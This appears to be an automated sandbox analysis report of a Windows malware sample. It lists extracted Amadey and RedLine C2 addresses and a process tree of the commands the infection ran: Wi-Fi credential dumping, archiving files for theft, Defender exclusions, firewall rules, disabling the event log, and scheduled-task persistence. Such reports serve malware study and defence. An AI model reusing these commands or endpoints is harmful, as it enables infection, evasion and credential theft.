Analysis

  • max time kernel
    83s
  • max time network
    296s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    28-03-2024 22:43

General

  • Target

    c643ac1729b33660a218af7260f0a8b3230c1ef8795d21528479396dfd491ccb.exe

  • Size

    1.9MB

  • MD5

    89450faa279114b445948f37ae2fc674

  • SHA1

    8730905024fa2787cbb858b0e9db33bdd22393e3

  • SHA256

    c643ac1729b33660a218af7260f0a8b3230c1ef8795d21528479396dfd491ccb

  • SHA512

    ddc4a1925c8822f81f894c775a0c180d5715a79f7c39cb82cf1f83d2353bc4da7a77d39ea4a4f2abcbeac4eba33e62234d22f41c5a9c45883e37af65a40719ab

  • SSDEEP

    49152:PAusQnXROzdymOTSMi7y6c7W3obn6cu2kFlEJpR:PA4kstSMiBk/uDAJp

Malware Config

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

185.172.128.33:8970

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • Detected google phishing page
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 19 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 10 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: MapViewOfSection 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c643ac1729b33660a218af7260f0a8b3230c1ef8795d21528479396dfd491ccb.exe
    "C:\Users\Admin\AppData\Local\Temp\c643ac1729b33660a218af7260f0a8b3230c1ef8795d21528479396dfd491ccb.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Users\Admin\AppData\Local\Temp\1000042001\d05c56647f.exe
        "C:\Users\Admin\AppData\Local\Temp\1000042001\d05c56647f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        PID:1740
      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
        "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        PID:4660
      • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
        "C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3804
      • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
        "C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3484
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            5⤵
              PID:2360
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\824464007487_Desktop.zip' -CompressionLevel Optimal
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5196
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
          3⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          PID:6112
    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2832
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3312
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      PID:4256
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1076
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1832
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:4240
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:3460
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:3200
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:5336
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      PID:5724
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      PID:5916
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:5832
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:1956
    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:5356
      • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
        "C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        PID:3804
      • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
        "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:5604
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:5668
            • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
              "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
              4⤵
              • Executes dropped EXE
              • Modifies system certificate store
              PID:5484
            • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
              "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2168
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
              4⤵
                PID:4676
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 3
                  5⤵
                    PID:6036
            • C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
              "C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
              2⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:5708
            • C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
              "C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
              2⤵
              • Executes dropped EXE
              PID:6076
            • C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
              "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:5276
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
              2⤵
              • Loads dropped DLL
              PID:5480
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                3⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:5848
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  4⤵
                    PID:4656
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\824464007487_Desktop.zip' -CompressionLevel Optimal
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6208
              • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                "C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe"
                2⤵
                • Executes dropped EXE
                PID:3604
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe" /F
                  3⤵
                  • Creates scheduled task(s)
                  PID:3184
                • C:\Users\Admin\AppData\Local\Temp\1000180001\ISetup8.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000180001\ISetup8.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:6352
                  • C:\Users\Admin\AppData\Local\Temp\u4wg.0.exe
                    "C:\Users\Admin\AppData\Local\Temp\u4wg.0.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:6984
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BKKJKFBKKE.exe"
                      5⤵
                        PID:7084
                        • C:\Users\Admin\AppData\Local\Temp\BKKJKFBKKE.exe
                          "C:\Users\Admin\AppData\Local\Temp\BKKJKFBKKE.exe"
                          6⤵
                            PID:7064
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\BKKJKFBKKE.exe
                              7⤵
                                PID:6396
                                • C:\Windows\SysWOW64\PING.EXE
                                  ping 2.2.2.2 -n 1 -w 3000
                                  8⤵
                                  • Runs ping.exe
                                  PID:2424
                        • C:\Users\Admin\AppData\Local\Temp\u4wg.1.exe
                          "C:\Users\Admin\AppData\Local\Temp\u4wg.1.exe"
                          4⤵
                            PID:4164
                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                              "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                              5⤵
                                PID:5600
                          • C:\Users\Admin\AppData\Local\Temp\1000181001\toolspub1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000181001\toolspub1.exe"
                            3⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            PID:6712
                          • C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe"
                            3⤵
                              PID:6764
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                4⤵
                                  PID:6312
                                • C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000182001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                  4⤵
                                    PID:6292
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      5⤵
                                        PID:4796
                                      • C:\Windows\System32\cmd.exe
                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                        5⤵
                                          PID:1588
                                          • C:\Windows\system32\netsh.exe
                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                            6⤵
                                            • Modifies Windows Firewall
                                            PID:3292
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          5⤵
                                            PID:6564
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            5⤵
                                              PID:6940
                                            • C:\Windows\rss\csrss.exe
                                              C:\Windows\rss\csrss.exe
                                              5⤵
                                                PID:6408
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  6⤵
                                                    PID:3880
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                    6⤵
                                                    • Creates scheduled task(s)
                                                    PID:5172
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    schtasks /delete /tn ScheduledUpdate /f
                                                    6⤵
                                                      PID:1128
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -nologo -noprofile
                                                      6⤵
                                                        PID:6676
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        6⤵
                                                          PID:6868
                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                          6⤵
                                                            PID:3840
                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                            6⤵
                                                            • Creates scheduled task(s)
                                                            PID:3504
                                                          • C:\Windows\windefender.exe
                                                            "C:\Windows\windefender.exe"
                                                            6⤵
                                                              PID:5132
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                7⤵
                                                                  PID:6760
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                    8⤵
                                                                    • Launches sc.exe
                                                                    PID:1376
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                        2⤵
                                                          PID:6028
                                                        • C:\Users\Admin\AppData\Local\Temp\1001052001\Eljlre.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1001052001\Eljlre.exe"
                                                          2⤵
                                                            PID:6176
                                                          • C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
                                                            2⤵
                                                              PID:6228
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                3⤵
                                                                  PID:6872
                                                              • C:\Users\Admin\AppData\Local\Temp\1001054001\Payload.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1001054001\Payload.exe"
                                                                2⤵
                                                                  PID:6092
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdABpACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGsAcABhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGkAcwAgAGMAbwBtAHAAdQB0AGUAcgAgAGkAcwAgAG4AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQALAAgAHAAbABlAGEAcwBlACAAdAByAHkAIABhAGcAYQBpAG4AIABvAG4AIABhAG4AbwB0AGgAZQByACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB5AGMAYQAjAD4A"
                                                                    3⤵
                                                                      PID:5756
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAagBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAcAB5ACMAPgA="
                                                                      3⤵
                                                                        PID:6568
                                                                      • C:\Users\Admin\AppData\Roaming\a.exe
                                                                        "C:\Users\Admin\AppData\Roaming\a.exe"
                                                                        3⤵
                                                                          PID:5504
                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                            4⤵
                                                                              PID:5132
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                              4⤵
                                                                                PID:1368
                                                                                • C:\Windows\system32\wusa.exe
                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                  5⤵
                                                                                    PID:3744
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe delete "TDFIYZSJ"
                                                                                  4⤵
                                                                                  • Launches sc.exe
                                                                                  PID:4252
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe create "TDFIYZSJ" binpath= "C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe" start= "auto"
                                                                                  4⤵
                                                                                  • Launches sc.exe
                                                                                  PID:5808
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe stop eventlog
                                                                                  4⤵
                                                                                  • Launches sc.exe
                                                                                  PID:3320
                                                                                • C:\Windows\system32\sc.exe
                                                                                  C:\Windows\system32\sc.exe start "TDFIYZSJ"
                                                                                  4⤵
                                                                                  • Launches sc.exe
                                                                                  PID:6728
                                                                              • C:\Users\Admin\AppData\Roaming\b.exe
                                                                                "C:\Users\Admin\AppData\Roaming\b.exe"
                                                                                3⤵
                                                                                  PID:5720
                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                              1⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Checks BIOS information in registry
                                                                              • Executes dropped EXE
                                                                              • Identifies Wine through registry keys
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:5444
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                                PID:7072
                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                1⤵
                                                                                  PID:6924
                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:7048
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
